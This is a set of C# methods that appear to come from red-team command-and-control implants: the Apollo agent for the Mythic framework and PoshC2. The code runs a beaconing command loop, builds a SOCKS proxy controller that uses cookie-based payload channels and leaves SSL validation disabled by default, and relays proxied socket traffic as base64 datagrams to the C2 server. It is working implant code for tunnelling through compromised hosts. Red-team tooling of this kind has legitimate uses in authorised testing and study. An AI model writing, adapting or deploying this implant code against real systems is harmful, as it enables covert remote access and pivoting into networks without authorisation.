public void StartCommandLoop(SocksController loopController)
{
_cancelTokenSource = new CancellationTokenSource();
_cancelToken = _cancelTokenSource.Token;
_commandChannelLoop = new System.Threading.Tasks.Task((g) => {
try
{
ImplantComms.LogMessage($"Command loop starting - beacon time is {C2Config.CommandBeaconTime}ms");
if (!CommandLoop((CancellationToken)g))
{
loopController.StopProxyComms();
_error.LogError($"Stopping all proxy comms as command channel is now broken");
return;
}
}
catch (Exception ex)
{
var lst = new List<String>
{
"Error in command channel loop"
};
_error.LogError($"Command Channel loop is broken {ex.Message}, hard stopping all connections");
loopController.StopProxyComms();
return;
}
}, _cancelToken);
_commandChannelLoop.Start();
}
public static SocksController CreateSocksController(Uri serverUri, String commandChannelId, String HostHeader, String userAgent, SecureString key, List <String> urlPaths, String sessionCookieName, String payloadCookieName, IWebProxy wbProxy = null, short beaconTime = 5000, IImplantLog implantcomms = null, bool sslFullValidation = false)
{
IImplantLog icomms = implantcomms ?? new PoshDefaultImplantComms();
var config = new SocksClientConfiguration
{
CommandChannelSessionId = commandChannelId,
BeaconTime = beaconTime,
UserAgent = userAgent,
CommandServerUI = serverUri,
UseProxy = (null != wbProxy),
URLPaths = urlPaths,
ImplantComms = icomms,
HostHeader = HostHeader,
PayloadCookieName = payloadCookieName,
SessionCookieName = sessionCookieName,
//By Default SSL Validation is disabled this is to aid intitial testing
//of the deployed infrastructure before a Production Release.
//It is reccomended that this is enabled before deploying to a full Scenario.
SSLFullValidation = sslFullValidation
};
if (null == key)
{
throw new Exception("Encryption key is null");
}
var socks = new SocksController(config)
{
Encryptor = new DebugSimpleEncryptor(key),
ImplantComms = icomms
};
socks.Initialize();
return(socks);
}
public void DispatchSocksDatagrams(SocksDatagram[] dgs)
{
//DebugWriteLine($"Processing {dgs.Length} SocksDatagrams...");
for (int i = 0; i < dgs.Length; i++)
{
//DebugWriteLine($"Datagram #{i + 1} is of length: {System.Convert.FromBase64String(dgs[i].data).Length}");
SocksController.AddDatagramToQueue(dgs[i]);
}
//DebugWriteLine($"Finished processing {dgs.Length} SocksDatagrams!");
}
private void SendTaskOutput()
{
int retryCount = 0;
Tasks.ApolloTaskResponse[] responses = JobManager.GetJobOutput();
SocksDatagram[] datagrams = SocksController.GetMythicMessagesFromQueue();
List <ApolloTaskResponse> lResponses = new List <ApolloTaskResponse>(); // probably should be used to resend
if (responses.Length > 0 || datagrams.Length > 0)
{
string guid = Guid.NewGuid().ToString();
while (retryCount < MAX_RETRIES)
{
string result = Profile.SendResponses(guid, responses, datagrams);
if (string.IsNullOrEmpty(result))
{
break;
}
MythicServerResponse serverReply = JsonConvert.DeserializeObject <MythicServerResponse>(result);
foreach (MythicTaskResponse rep in serverReply.responses)
{
if (rep.status == "error")
{
lResponses.Add(responses.Single(c => c.task_id == rep.task_id));
}
else
{
Inbox.AddMessage(rep.task_id, rep);
}
}
if (serverReply.delegates != null && serverReply.delegates.Length > 0)
{
DispatchDelegates(serverReply.delegates);
}
responses = lResponses.ToArray();
lResponses.Clear();
retryCount += 1;
if (responses.Length == 0)
{
break;
}
}
}
}
private void ReadFromProxy()
{
ClientConnection.ReceiveTimeout = 10000;
while (!exited)
{
byte[] bufIn = new byte[MESSAGE_SIZE];
int totalRead = 0;
try
{
////DebugWriteLine($"Attempting to read data from {IPAddress}");
totalRead = ClientConnection.Receive(bufIn);
}
catch (SocketException ex)
{
//ExitEvent.Set();
DebugWriteLine($"{IPAddress} ({ServerID}) error while reading from socket: {ex.Message} ({ex.SocketErrorCode}).");
break;
}
catch (Exception ex)
{
//ExitEvent.Set();
DebugWriteLine($"{IPAddress} ({ServerID}) Unhandled exception while reading from socket: {ex.Message}");
//SocksController.SendDisconnectRemoveConnection(this);
break;
}
//Console.WriteLine($"Read {totalRead} bytes from {conn.ServerID}");
if (totalRead > 0)
{
byte[] dataToSend = new byte[totalRead];
//DebugWriteLine($"{IPAddress} ({ServerID}) Beginning data copy into new array...");
Array.Copy(bufIn, dataToSend, totalRead);
//DebugWriteLine($"{IPAddress} ({ServerID}) Finished copying data into new array.");
SocksDatagram msg = new SocksDatagram()
{
server_id = ServerID,
data = Convert.ToBase64String(dataToSend),
};
SocksController.AddMythicMessageToQueue(msg);
}
}
Close();
}
public static void Execute(Job job, Agent agent)
{
Task task = job.Task;
JObject json = (JObject)JsonConvert.DeserializeObject(task.parameters);
string action = json.Value <string>("action");
//SocksParams socksParams = Newtonsoft.Json.JsonConvert.DeserializeObject<SocksParams>(job.Task.parameters);
switch (action)
{
case "start":
if (SocksController.IsActive())
{
job.SetError("Socks proxy is already active.");
return;
}
job.OnKill = delegate()
{
SocksController.StopClientPort();
};
SocksController.StartClientPort();
job.SetComplete($"SOCKS server started.");
break;
case "stop":
SocksController.StopClientPort();
job.SetComplete("SOCKS server stopped.");
break;
default:
job.SetError("Invalid action.");
break;
}
}